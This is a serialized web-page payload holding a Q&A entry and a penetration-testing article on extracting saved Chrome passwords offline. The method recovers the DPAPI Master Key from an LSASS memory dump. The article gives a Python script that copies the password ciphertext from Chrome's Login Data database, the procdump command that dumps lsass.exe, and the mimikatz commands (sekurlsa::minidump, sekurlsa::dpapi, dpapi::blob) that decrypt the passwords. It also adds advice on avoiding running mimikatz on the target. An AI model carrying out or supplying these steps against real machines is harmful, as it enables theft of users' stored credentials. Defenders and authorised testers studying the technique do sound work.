[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnWY3W9G00nON2YIM6IkZ0fqPxwPzvy0xVd7LLpekt5s":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},846,"What are the steps to perform offline extraction of Chrome saved passwords using the Master Key approach?","First, obtain the `Login Data` SQLite database from `%LocalAppData%\\Google\\Chrome\\User Data\\Default\\`. Second, acquire the lsass process memory dump (e.g., using procdump). Finally, use mimikatz locally to load the dump, extract the Master Key with `sekurlsa::dpapi`, and then decrypt the DPAPI blob with `dpapi::blob \u002Fin:test.txt` to retrieve the plaintext passwords. No plaintext password from the target user is required.","\u003Cp>First, obtain the `Login Data` SQLite database from `%LocalAppData%\\Google\\Chrome\\User Data\\Default\\`. Second, acquire the lsass process memory dump (e.g., using procdump). Finally, use mimikatz locally to load the dump, extract the Master Key with `sekurlsa::dpapi`, and then decrypt the DPAPI blob with `dpapi::blob \u002Fin:test.txt` to retrieve the plaintext passwords. No plaintext password from the target user is required.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-offline-extraction-of-saved-passwords-in-chrome-browser-using-masterkey\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-steps-to-perform-offline-extraction-of-chrome-saved-passwords-using-1777481591149","Login Data, SQLite, lsass dump, procdump, mimikatz, dpapi::blob, plaintext passwords",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},207,"Penetration Techniques - Offline Extraction of Saved Passwords in Chrome Browser Using Masterkey","penetration-techniques-offline-extraction-of-saved-passwords-in-chrome-browser-using-masterkey","Learn to extract saved Chrome passwords offline using Masterkey without needing user plaintext passwords. Covers DPAPI, LSASS, and practical steps.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Penetration Techniques - Offline Extraction of Saved Passwords in Chrome Browser', it was concluded that using the user's NTLM hash, it is impossible to extract the plaintext passwords saved in the Chrome browser.\u003C\u002Fp>\u003Cp>However, in current Windows systems (such as Windows Server 2012), it is not possible to extract the user's plaintext password by default; only the NTLM hash can be obtained.\u003C\u002Fp>\u003Cp>This means that even if system access is obtained, if the plaintext password cannot be acquired, the method introduced in the article 'Penetration Techniques - Offline Extraction of Saved Passwords in Chrome Browser' still cannot extract the plaintext passwords saved in the Chrome browser offline (though it can be done online).\u003C\u002Fp>\u003Cp>This article will introduce a new method to extract saved passwords in the Chrome browser offline using the Masterkey, without needing the user's plaintext password, and will present new conclusions.\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Basic Concepts\u003C\u002Fli>\u003Cli>Decryption Approach\u003C\u002Fli>\u003Cli>Extraction Methods\u003C\u002Fli>\u003Cli>Practical Testing\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>DPAPI:\u003C\u002Fh4>\u003Cp>Full name Data Protection Application Programming Interface\u003C\u002Fp>\u003Ch4>DPAPI blob:\u003C\u002Fh4>\u003Cp>A piece of ciphertext that can be decrypted using the Master Key\u003C\u002Fp>\u003Ch4>Master Key:\u003C\u002Fh4>\u003Cp>64 bytes, used to decrypt the DPAPI blob, encrypted with the user login password, SID, and a 16-byte random number, then stored in the Master Key file\u003C\u002Fp>\u003Ch4>Master Key file:\u003C\u002Fh4>\u003Cp>A binary file that can be decrypted using the user login password to obtain the Master Key\u003C\u002Fp>\u003Ch2>0x03 DPAPI Decryption Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Locate the encrypted Master Key file\u003C\u002Fh3>\u003Cp>The article 'Penetration Techniques - Offline Export of Passwords Saved in Chrome Browser' previously concluded: Unable to locate the Master Key file corresponding to decrypting the Chrome database\u003C\u002Fp>\u003Cp>This conclusion is incorrect; it can actually be located, method detailed in 0x04\u003C\u002Fp>\u003Ch3>2. Extract the Master Key from the lsass process\u003C\u002Fh3>\u003Cp>Here a different approach is adopted, thus the user's plaintext password is not required\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>To extract the Master Key offline from the Master Key file, the user's plaintext password must be obtained\u003C\u002Fp>\u003Ch3>3. Use the Master Key to decrypt the DPAPI blob and obtain the plaintext\u003C\u002Fh3>\u003Ch2>0x04 Implementation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test System:\u003C\u002Fp>\u003Cp>Win7 x86\u003C\u002Fp>\u003Ch3>1. Use Python to read the database file and extract the ciphertext\u003C\u002Fh3>\u003Cp>Use a Python script to read Login Data and save it to a file. The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>from os import getenv\u003Cbr>import sqlite3\u003Cbr>import binascii\u003Cbr>conn = sqlite3.connect(\"Login Data\")\u003Cbr>cursor = conn.cursor()\u003Cbr>cursor.execute('SELECT action_url, username_value, password_value FROM logins')\u003Cbr>for result in cursor.fetchall():\u003Cbr>    print(binascii.b2a_hex(result[2]))\u003Cbr>    f = open('test.txt', 'wb')\u003Cbr>    f.write(result[2])\u003Cbr>    f.close()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After script execution, extract the ciphertext stored in Login Data and save it as test.txt\u003C\u002Fp>\u003Ch3>2. Obtain the Master Key file corresponding to this ciphertext\u003C\u002Fh3>\u003Cp>mimikatz command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpapi::blob \u002Fin:test.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the corresponding guidMasterkey as {a111b0f6-b4d7-40c8-b536-672a8288b958}\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017262624_0_7bae0ecc82.png\">\u003C\u002Fp>\u003Cp>That is, the path of the Master Key file is %APPDATA%\\Microsoft\\Protect\\%SID%\\a111b0f6-b4d7-40c8-b536-672a8288b958\u003C\u002Fp>\u003Ch3>3. Extract the Master Key from the lsass process\u003C\u002Fh3>\u003Ch4>(1) Online method\u003C\u002Fh4>\u003Cp>Requires administrator privileges\u003C\u002Fp>\u003Cp>mimikatz:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>privilege::debug\u003Cbr>sekurlsa::dpapi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017288524_1_86239f2a53.png\">\u003C\u002Fp>\u003Cp>Extracted Master Key is 666638cbaea3b7cf1dc55688f939e50ea1002cded954a1d17d5fe0fbc90b7dd34677ac148af1f32caf828fdf7234bafbe14b39791b3d7e587176576d39c3fa70\u003C\u002Fp>\u003Ch4>(2) Offline method\u003C\u002Fh4>\u003Cp>Use procdump to dump LSASS process memory\u003C\u002Fp>\u003Cp>procdump download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fzh-cn\u002Fsysinternals\u002Fdownloads\u002Fprocdump\u003C\u002Fp>\u003Cp>Administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>procdump.exe -accepteula -ma lsass.exe lsass.dmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Use mimikatz to load the dmp file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sekurlsa::minidump lsass.dmp\u003Cbr>sekurlsa::dpapi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After extracting the Master Key from the lsass process, mimikatz automatically adds the Master Key to the system cache\u003C\u002Fp>\u003Ch3>4. Decrypt using the master key\u003C\u002Fh3>\u003Cp>mimikatz:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpapi::blob \u002Fin:test.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully obtained plaintext, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017321219_2_2ebc0ecac1.png\">\u003C\u002Fp>\u003Cp>Data is correct, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017377832_3_93a360f8d9.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The method introduced in this article involves restoring the Master Key from the lsass process, thus eliminating the need to obtain the user's plaintext password\u003C\u002Fp>\u003Cp>Additionally, by using procdump, there is no need to execute mimikatz on the test system. Only two files from the target system are required: the lsass process dump file and the Login Data file. The Master Key can be restored locally using mimikatz to decrypt and obtain the plaintext\u003C\u002Fp>\u003Cp>Moreover, there is no need to downgrade from System privileges to the current user's privileges.\u003C\u002Fp>\u003Cp>In summary, the complete approach for offline export is as follows:\u003C\u002Fp>\u003Ch4>1. Obtain the SQLite database file where Chrome saves passwords, located at %LocalAppData%\\Google\\Chrome\\User Data\\Default\\Login Data\u003C\u002Fh4>\u003Ch4>2. Acquire the memory file of the lsass process\u003C\u002Fh4>\u003Ch4>3. Use mimikatz locally to extract the Master Key and decrypt Login Data to obtain plaintext passwords\u003C\u002Fh4>\u003Ch2>0x06 Final Conclusion\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Ability to locate the Master Key file\u003C\u002Fh3>\u003Cp>Method 1:\u003C\u002Fp>\u003Cp>mimikatz command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpapi::blob \u002Fin:test.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Method 2:\u003C\u002Fp>\u003Cp>Obtain the corresponding Master Key file by reading the first 16 bytes of the Preferred file\u003C\u002Fp>\u003Ch3>2. Offline export of saved passwords in Chrome browser is possible without the user's plaintext password\u003C\u002Fh3>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces how to use Masterkey to offline export saved passwords in the Chrome browser, which is more versatile compared to previous methods.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article 'Penetration Techniques - Offline Extraction of Saved Passwords in Chrome Browser', it was concluded that using the user's NTLM hash, it is impossible to extract the plaintext passwords saved in the Chrome browser.\u003C\u002Fp>\u003Cp>However, in current Windows systems (such as Windows Server 2012), it is not possible to extract the user's plaintext password by default; only the NTLM hash can be obtained.\u003C\u002Fp>\u003Cp>This means that even if system access is obtained, if the plaintext password cannot be acquired, the method introduced in the article 'Penetration Techniques - Offline Extraction of Saved Passwords in Chrome Browser' still cannot extract the plaintext passwords saved in the Chrome browser offline (though it can be done online).\u003C\u002Fp>\u003Cp>This article will introduce a new method to extract saved passwords in the Chrome browser offline using the Masterkey, without needing the user's plaintext password, and will present new conclusions.\u003C\u002Fp>\u003Ch2>0x01 Overview\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Basic Concepts\u003C\u002Fli>\u003Cli>Decryption Approach\u003C\u002Fli>\u003Cli>Extraction Methods\u003C\u002Fli>\u003Cli>Practical Testing\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>DPAPI:\u003C\u002Fh4>\u003Cp>Full name Data Protection Application Programming Interface\u003C\u002Fp>\u003Ch4>DPAPI blob:\u003C\u002Fh4>\u003Cp>A piece of ciphertext that can be decrypted using the Master Key\u003C\u002Fp>\u003Ch4>Master Key:\u003C\u002Fh4>\u003Cp>64 bytes, used to decrypt the DPAPI blob, encrypted with the user login password, SID, and a 16-byte random number, then stored in the Master Key file\u003C\u002Fp>\u003Ch4>Master Key file:\u003C\u002Fh4>\u003Cp>A binary file that can be decrypted using the user login password to obtain the Master Key\u003C\u002Fp>\u003Ch2>0x03 DPAPI Decryption Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Locate the encrypted Master Key file\u003C\u002Fh3>\u003Cp>The article 'Penetration Techniques - Offline Export of Passwords Saved in Chrome Browser' previously concluded: Unable to locate the Master Key file corresponding to decrypting the Chrome database\u003C\u002Fp>\u003Cp>This conclusion is incorrect; it can actually be located, method detailed in 0x04\u003C\u002Fp>\u003Ch3>2. Extract the Master Key from the lsass process\u003C\u002Fh3>\u003Cp>Here a different approach is adopted, thus the user's plaintext password is not required\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>To extract the Master Key offline from the Master Key file, the user's plaintext password must be obtained\u003C\u002Fp>\u003Ch3>3. Use the Master Key to decrypt the DPAPI blob and obtain the plaintext\u003C\u002Fh3>\u003Ch2>0x04 Implementation Method\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test System:\u003C\u002Fp>\u003Cp>Win7 x86\u003C\u002Fp>\u003Ch3>1. Use Python to read the database file and extract the ciphertext\u003C\u002Fh3>\u003Cp>Use a Python script to read Login Data and save it to a file. The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>from os import getenv\u003Cbr>import sqlite3\u003Cbr>import binascii\u003Cbr>conn = sqlite3.connect(\"Login Data\")\u003Cbr>cursor = conn.cursor()\u003Cbr>cursor.execute('SELECT action_url, username_value, password_value FROM logins')\u003Cbr>for result in cursor.fetchall():\u003Cbr>    print(binascii.b2a_hex(result[2]))\u003Cbr>    f = open('test.txt', 'wb')\u003Cbr>    f.write(result[2])\u003Cbr>    f.close()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After script execution, extract the ciphertext stored in Login Data and save it as test.txt\u003C\u002Fp>\u003Ch3>2. Obtain the Master Key file corresponding to this ciphertext\u003C\u002Fh3>\u003Cp>mimikatz command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpapi::blob \u002Fin:test.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the corresponding guidMasterkey as {a111b0f6-b4d7-40c8-b536-672a8288b958}\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017262624_0_7bae0ecc82-1.png\">\u003C\u002Fp>\u003Cp>That is, the path of the Master Key file is %APPDATA%\\Microsoft\\Protect\\%SID%\\a111b0f6-b4d7-40c8-b536-672a8288b958\u003C\u002Fp>\u003Ch3>3. Extract the Master Key from the lsass process\u003C\u002Fh3>\u003Ch4>(1) Online method\u003C\u002Fh4>\u003Cp>Requires administrator privileges\u003C\u002Fp>\u003Cp>mimikatz:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>privilege::debug\u003Cbr>sekurlsa::dpapi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017288524_1_86239f2a53-1.png\">\u003C\u002Fp>\u003Cp>Extracted Master Key is 666638cbaea3b7cf1dc55688f939e50ea1002cded954a1d17d5fe0fbc90b7dd34677ac148af1f32caf828fdf7234bafbe14b39791b3d7e587176576d39c3fa70\u003C\u002Fp>\u003Ch4>(2) Offline method\u003C\u002Fh4>\u003Cp>Use procdump to dump LSASS process memory\u003C\u002Fp>\u003Cp>procdump download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fzh-cn\u002Fsysinternals\u002Fdownloads\u002Fprocdump\u003C\u002Fp>\u003Cp>Administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>procdump.exe -accepteula -ma lsass.exe lsass.dmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Use mimikatz to load the dmp file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sekurlsa::minidump lsass.dmp\u003Cbr>sekurlsa::dpapi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After extracting the Master Key from the lsass process, mimikatz automatically adds the Master Key to the system cache\u003C\u002Fp>\u003Ch3>4. Decrypt using the master key\u003C\u002Fh3>\u003Cp>mimikatz:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpapi::blob \u002Fin:test.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Successfully obtained plaintext, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017321219_2_2ebc0ecac1-1.png\">\u003C\u002Fp>\u003Cp>Data is correct, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017377832_3_93a360f8d9-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The method introduced in this article involves restoring the Master Key from the lsass process, thus eliminating the need to obtain the user's plaintext password\u003C\u002Fp>\u003Cp>Additionally, by using procdump, there is no need to execute mimikatz on the test system. Only two files from the target system are required: the lsass process dump file and the Login Data file. The Master Key can be restored locally using mimikatz to decrypt and obtain the plaintext\u003C\u002Fp>\u003Cp>Moreover, there is no need to downgrade from System privileges to the current user's privileges.\u003C\u002Fp>\u003Cp>In summary, the complete approach for offline export is as follows:\u003C\u002Fp>\u003Ch4>1. Obtain the SQLite database file where Chrome saves passwords, located at %LocalAppData%\\Google\\Chrome\\User Data\\Default\\Login Data\u003C\u002Fh4>\u003Ch4>2. Acquire the memory file of the lsass process\u003C\u002Fh4>\u003Ch4>3. Use mimikatz locally to extract the Master Key and decrypt Login Data to obtain plaintext passwords\u003C\u002Fh4>\u003Ch2>0x06 Final Conclusion\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Ability to locate the Master Key file\u003C\u002Fh3>\u003Cp>Method 1:\u003C\u002Fp>\u003Cp>mimikatz command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpapi::blob \u002Fin:test.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Method 2:\u003C\u002Fp>\u003Cp>Obtain the corresponding Master Key file by reading the first 16 bytes of the Preferred file\u003C\u002Fp>\u003Ch3>2. Offline export of saved passwords in Chrome browser is possible without the user's plaintext password\u003C\u002Fh3>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces how to use Masterkey to offline export saved passwords in the Chrome browser, which is more versatile compared to previous methods.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",734,"Onedaysec",4,"published","2026-02-02T07:38:21.197Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Extract Chrome Passwords Offline Using Masterkey Without Plaintext","Chrome password extraction, offline decryption, DPAPI, Masterkey, penetration testing, Windows security, mimikatz, LSASS",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],848,847,845,844,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.243Z","2026-07-23T16:02:11.626Z","draft","2026-07-23T16:15:04.895Z"]